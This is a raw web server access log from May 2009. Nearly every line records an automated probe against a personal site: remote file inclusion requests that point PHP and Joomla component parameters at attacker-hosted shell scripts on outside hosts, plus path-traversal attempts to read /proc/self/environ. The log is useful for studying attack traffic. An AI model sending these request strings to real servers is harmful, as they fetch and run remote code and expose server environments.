217.172.168.63 - - [19/May/2009:10:43:32 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://voo.owned.lt/sp/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.151.224.239 - - [19/May/2009:10:43:42 -0700] "GET /e404.php?DOCUMENT_ROOT=http://www.byufolkdance.com/foto.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.823" "www.dmulk.com"
62.149.163.198 - - [19/May/2009:10:43:43 -0700] "GET /include.php?path[docroot]=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
62.149.163.198 - - [19/May/2009:10:43:43 -0700] "GET /logs/access_080304.log//include.php?path[docroot]=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
62.149.163.198 - - [19/May/2009:10:43:43 -0700] "GET /logs//include.php?path[docroot]=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
62.149.163.198 - - [19/May/2009:10:43:44 -0700] "GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
62.149.163.198 - - [19/May/2009:10:43:44 -0700] "GET /logs/access_080304.log/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
62.149.163.198 - - [19/May/2009:10:43:44 -0700] "GET /logs/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
62.149.163.198 - - [19/May/2009:10:43:44 -0700] "GET /include.php?path[docroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
62.149.163.198 - - [19/May/2009:10:43:44 -0700] "GET /logs/access_080304.log//include.php?path[docroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
62.149.163.198 - - [19/May/2009:10:43:44 -0700] "GET /logs//include.php?path[docroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
62.149.163.198 - - [19/May/2009:10:43:45 -0700] "GET /logs/access_080304.log//include.php?path[docroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
62.149.163.198 - - [19/May/2009:10:43:45 -0700] "GET /include.php?path[docroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
62.149.163.198 - - [19/May/2009:10:43:45 -0700] "GET /logs//include.php?path[docroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
62.44.79.35 - - [19/May/2009:10:43:48 -0700] "GET /logs/index.php?include=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [19/May/2009:10:43:48 -0700] "GET /logs/access_090307.log%20%20/index.php?include=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [19/May/2009:10:43:53 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:43:56 -0700] "GET /logs/access_081230.log%20%20/?_zb_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:10:44:06 -0700] "GET /logs/access_081124.log//bbs/include/print_category.php?setup[use_category]=1&dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:10:44:06 -0700] "GET /bbs/include/print_category.php?setup[use_category]=1&dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:10:44:06 -0700] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.42 - - [19/May/2009:10:44:07 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
91.121.210.42 - - [19/May/2009:10:44:14 -0700] "GET /logs/access_080902.log//osticket/include/main.php?config[search_disp]=true&include_dir=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.149.163.198 - - [19/May/2009:10:44:19 -0700] "GET /logs/access_080430.log//include.php?path[docroot]=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
62.149.163.198 - - [19/May/2009:10:44:20 -0700] "GET /logs/access_080430.log/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
62.149.163.198 - - [19/May/2009:10:44:20 -0700] "GET /logs/access_080430.log//include.php?path[docroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
62.149.163.198 - - [19/May/2009:10:44:20 -0700] "GET /logs/access_080430.log//include.php?path[docroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
87.106.135.14 - - [19/May/2009:10:44:22 -0700] "GET /logs/access_081124.log//bbs/include/print_category.php?setup[use_category]=1&dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.135.14 - - [19/May/2009:10:44:23 -0700] "GET /bbs/include/print_category.php?setup[use_category]=1&dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.135.14 - - [19/May/2009:10:44:23 -0700] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.119.103.12 - - [19/May/2009:10:44:29 -0700] "GET /logs/access_081222.log//bbs/include/print_category.php?setup[use_category]=1&dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.44.79.35 - - [19/May/2009:10:44:32 -0700] "GET /index.php?include=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 41928 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [19/May/2009:10:44:36 -0700] "GET /logs/index.php?include=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [19/May/2009:10:44:36 -0700] "GET /logs/access_090307.log%20%20/index.php?include=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [19/May/2009:10:44:38 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
193.189.247.191 - - [19/May/2009:10:44:43 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://voo.owned.lt/sp/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.189.247.191 - - [19/May/2009:10:44:44 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://voo.owned.lt/sp/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:44:45 -0700] "GET /logs/access_081230.log%20%20/?_zb_path=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [19/May/2009:10:44:54 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
87.106.135.14 - - [19/May/2009:10:44:57 -0700] "GET /logs/access_081222.log//bbs/include/print_category.php?setup[use_category]=1&dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.17.132.115 - - [19/May/2009:10:44:57 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://voo.owned.lt/sp/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.17.132.115 - - [19/May/2009:10:44:57 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://voo.owned.lt/sp/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [19/May/2009:10:44:58 -0700] "GET /logs/access_090307.log%20%20/index.php?include=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [19/May/2009:10:44:58 -0700] "GET /logs/index.php?include=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:10:44:59 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
209.17.132.115 - - [19/May/2009:10:45:06 -0700] "GET /logs/access_080320.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://voo.owned.lt/sp/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.17.132.115 - - [19/May/2009:10:45:06 -0700] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://voo.owned.lt/sp/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.17.132.115 - - [19/May/2009:10:45:06 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://voo.owned.lt/sp/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.17.132.115 - - [19/May/2009:10:45:06 -0700] "GET /logs/access_090120.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://voo.owned.lt/sp/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.17.132.115 - - [19/May/2009:10:45:07 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://voo.owned.lt/sp/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.17.132.115 - - [19/May/2009:10:45:07 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://voo.owned.lt/sp/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.17.132.115 - - [19/May/2009:10:45:10 -0700] "GET /logs/access_080221.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://voo.owned.lt/sp/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:10:45:15 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
62.44.79.35 - - [19/May/2009:10:45:17 -0700] "GET /logs/access_081102.log%20%20/index.php?include=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [19/May/2009:10:45:19 -0700] "GET /index.php?include=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 41928 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [19/May/2009:10:45:23 -0700] "GET /logs/access_090307.log/index.php?include=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.17.132.115 - - [19/May/2009:10:45:30 -0700] "GET /logs/access_080228.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://voo.owned.lt/sp/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.17.132.115 - - [19/May/2009:10:45:30 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://voo.owned.lt/sp/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.17.132.115 - - [19/May/2009:10:45:30 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://voo.owned.lt/sp/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [19/May/2009:10:45:34 -0700] "GET /logs/access_090307.log/index.php?include=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.44.79.35 - - [19/May/2009:10:45:36 -0700] "GET /logs/access_081102.log/index.php?include=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [19/May/2009:10:45:38 -0700] "GET /index.php?include=http://theblythes.net/cal/mydb?? HTTP/1.1" 200 41923 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:45:39 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:45:39 -0700] "GET /logs/access_090118.log//components/com_simpleboard/image_upload.php?sbp=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:45:39 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:45:39 -0700] "GET /logs/access_080502.log//components/com_simpleboard/image_upload.php?sbp=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [19/May/2009:10:45:42 -0700] "GET /logs/access_090307.log/index.php?include=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.17.132.115 - - [19/May/2009:10:45:44 -0700] "GET /logs/access_090308.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://voo.owned.lt/sp/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.17.132.115 - - [19/May/2009:10:45:44 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://voo.owned.lt/sp/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.17.132.115 - - [19/May/2009:10:45:44 -0700] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://voo.owned.lt/sp/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [19/May/2009:10:45:48 -0700] "GET /logs/access_081102.log/index.php?include=http://theblythes.net/cal/mydb?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.17.132.115 - - [19/May/2009:10:45:53 -0700] "GET /logs/access_081005.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://voo.owned.lt/sp/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
212.150.52.114 - - [19/May/2009:10:45:59 -0700] "GET /logs/access_081102.log/index.php?include=http://theblythes.net/cal/mydb?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.17.132.115 - - [19/May/2009:10:46:18 -0700] "GET /logs/access_080808.log//popup_window.php?site_isp_root=http://voo.owned.lt/sp/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.17.132.115 - - [19/May/2009:10:46:18 -0700] "GET /popup_window.php?site_isp_root=http://voo.owned.lt/sp/tc.v? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.17.132.115 - - [19/May/2009:10:46:18 -0700] "GET /logs//popup_window.php?site_isp_root=http://voo.owned.lt/sp/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.108.64.88 - - [19/May/2009:10:46:19 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 200 100197 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.88 - - [19/May/2009:10:46:21 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 200 100197 "-" "libwww-perl/5.812" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:10:46:21 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:10:46:24 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:10:46:44 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
64.157.4.43 - - [19/May/2009:10:46:47 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
209.17.132.115 - - [19/May/2009:10:46:56 -0700] "GET /logs/access_090221.log//components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://voo.owned.lt/sp/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.17.132.115 - - [19/May/2009:10:46:57 -0700] "GET /logs/access_080831.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://voo.owned.lt/sp/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.108.64.88 - - [19/May/2009:10:47:00 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 500 292 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.88 - - [19/May/2009:10:47:17 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.kyokushin.hu/data/log.txt? HTTP/1.1" 200 42074 "-" "libwww-perl/5.812" "www.dmulk.com"
209.17.132.115 - - [19/May/2009:10:47:18 -0700] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://voo.owned.lt/sp/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.17.132.115 - - [19/May/2009:10:47:18 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://voo.owned.lt/sp/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.17.132.115 - - [19/May/2009:10:47:18 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://voo.owned.lt/sp/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.17.132.115 - - [19/May/2009:10:47:24 -0700] "GET /logs/access_080812.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://voo.owned.lt/sp/tc.v? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.17.132.115 - - [19/May/2009:10:47:41 -0700] "GET /logs/access_080608.log/adxmlrpc.php HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.17.132.115 - - [19/May/2009:10:47:41 -0700] "GET /adxmlrpc.php HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.17.132.115 - - [19/May/2009:10:47:41 -0700] "GET /logs/adxmlrpc.php HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.18.76.16 - - [19/May/2009:10:48:45 -0700] "GET /logs/access_081222.log//bbs/include/print_category.php?setup[use_category]=1&dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.18.76.16 - - [19/May/2009:10:48:45 -0700] "GET /bbs/include/print_category.php?setup[use_category]=1&dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.18.76.16 - - [19/May/2009:10:48:45 -0700] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.18.76.16 - - [19/May/2009:10:48:55 -0700] "GET /logs/access_081117.log//bbs/include/print_category.php?setup[use_category]=1&dir=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.10 - - [19/May/2009:10:48:58 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.10 - - [19/May/2009:10:48:58 -0700] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.10 - - [19/May/2009:10:49:06 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.221.130.10 - - [19/May/2009:10:49:06 -0700] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.kyokushin.hu/data/log.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:49:15 -0700] "GET /logs/access_090118.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:49:15 -0700] "GET /logs/access_080502.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [19/May/2009:10:49:19 -0700] "GET /include/statistic.inc.php?tm_includepath=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [19/May/2009:10:49:19 -0700] "GET /logs/include/statistic.inc.php?tm_includepath=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [19/May/2009:10:49:19 -0700] "GET /logs/access_080409.log/include/statistic.inc.php?tm_includepath=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.44.232.81 - - [19/May/2009:10:49:22 -0700] "GET /include/Classes.inc.php?tm_includepath=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.44.232.81 - - [19/May/2009:10:49:22 -0700] "GET /logs/include/Classes.inc.php?tm_includepath=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.44.232.81 - - [19/May/2009:10:49:22 -0700] "GET /logs/access_080409.log%20%20/include/Classes.inc.php?tm_includepath=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [19/May/2009:10:49:27 -0700] "GET /logs/access_081225.log/include/statistic.inc.php?tm_includepath=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.44.232.81 - - [19/May/2009:10:49:43 -0700] "GET /logs/access_081225.log%20%20/include/Classes.inc.php?tm_includepath=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [19/May/2009:10:49:50 -0700] "GET /logs/access_080409.log%20%20/include/statistic.inc.php?tm_includepath=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:50:07 -0700] "GET /logs/access_071219.log%20%20//components/com_simpleboard/file_upload.php?sbp=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.151.132.176 - - [19/May/2009:10:50:16 -0700] "GET /logs/access_081225.log%20%20/include/statistic.inc.php?tm_includepath=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.90.91.245 - - [19/May/2009:10:50:26 -0700] "GET /logs/access_080906.log/common/func.php?CommonAbsDir=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.dmulk.com"
209.90.91.245 - - [19/May/2009:10:50:26 -0700] "GET /common/func.php?CommonAbsDir=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.dmulk.com"
209.90.91.245 - - [19/May/2009:10:50:26 -0700] "GET /logs/common/func.php?CommonAbsDir=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.dmulk.com"
190.144.44.36 - - [19/May/2009:10:50:48 -0700] "GET /logs/access_080107.log%20%20//components/com_simpleboard/file_upload.php?sbp=http://dolphinplugins.com/wall/thumbs/v5.1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.118.194.200 - - [19/May/2009:10:51:13 -0700] "GET /logs/access_071224.log//skin/zero_vote/ask_password.php?%20dir=http://jasek.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.118.194.200 - - [19/May/2009:10:51:13 -0700] "GET /skin/zero_vote/ask_password.php?%20dir=http://jasek.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.118.194.200 - - [19/May/2009:10:51:13 -0700] "GET /logs//skin/zero_vote/ask_password.php?%20dir=http://jasek.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.118.194.200 - - [19/May/2009:10:51:22 -0700] "GET /logs/access_090124.log//skin/zero_vote/ask_password.php?%20dir=http://jasek.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.44.232.81 - - [19/May/2009:10:51:27 -0700] "GET /logs/access_080409.log/include/Classes.inc.php?tm_includepath=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.44.232.81 - - [19/May/2009:10:51:32 -0700] "GET /logs/access_081225.log/include/Classes.inc.php?tm_includepath=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
